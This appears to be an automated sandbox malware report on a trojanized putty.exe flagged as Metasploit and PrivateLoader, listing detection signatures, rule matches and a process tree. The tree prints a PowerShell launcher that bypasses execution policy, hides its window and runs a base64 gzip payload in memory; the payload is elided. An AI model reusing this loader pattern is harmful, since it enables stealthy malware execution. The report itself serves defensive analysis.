Analysis Report: putty.exe (Windows)
Overview

General Information

Detection: Metasploit, PrivateLoader

Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures

- Antivirus / Scanner detection for submitted sample
- Antivirus detection for URL or domain
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for submitted file
- Yara detected Metasploit Payload
- Yara detected PrivateLoader
- Bypasses PowerShell execution policy
- Found suspicious PowerShell code related to unpacking or dynamic code loading
- Machine Learning detection for sample
- PE file has a writeable .text section
- Sigma detected: Base64 Encoded PowerShell Command Detected
- Sigma detected: Potential PowerShell Command Line Obfuscation
- Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
- Sigma detected: Suspicious PowerShell Parameter Substring
- Suspicious PowerShell command line found
- Contains long sleeps (>= 3 min)
- Enables debug privileges
- Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
- May sleep (evasive loops) to hinder dynamic analysis
- PE file contains an invalid checksum
- PE file contains sections with non-standard names
- Queries the volume information (name, serial number, etc.) of a device
- Sample file name is different from the original file name gathered from version info
- Sigma detected: Change PowerShell Policies to an Insecure Level
- Sigma detected: Gzip Archive Decode Via PowerShell
- Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
- Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
- Uses 32bit PE files
- Very long cmdline option found, this is very uncommon (may be encrypted or packed)
- Yara signature match
Classification
- System is w10x64
- putty.exe (PID: 7256, cmdline: `"C:\Users\user\Desktop\putty.exe"`, MD5: 334A10500FEB0F3444BF2E86AB2E76DA)
- powershell.exe (PID: 7276, cmdline: `powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('<base64-encoded gzip payload elided>'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"`, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7284, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
PrivateLoader | According to Sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server. | No Attribution | | |

No configs have been found.
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security | |
| JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security | |
| Windows_Trojan_Metasploit_a6e956c9 | Identifies the API address lookup function leveraged by Metasploit shellcode | unknown | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security | |
| Windows_Trojan_Metasploit_a6e956c9 | Identifies the API address lookup function leveraged by Metasploit shellcode | unknown | |
| JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
System Summary

Source: | Author: Florian Roth (Nextron Systems) |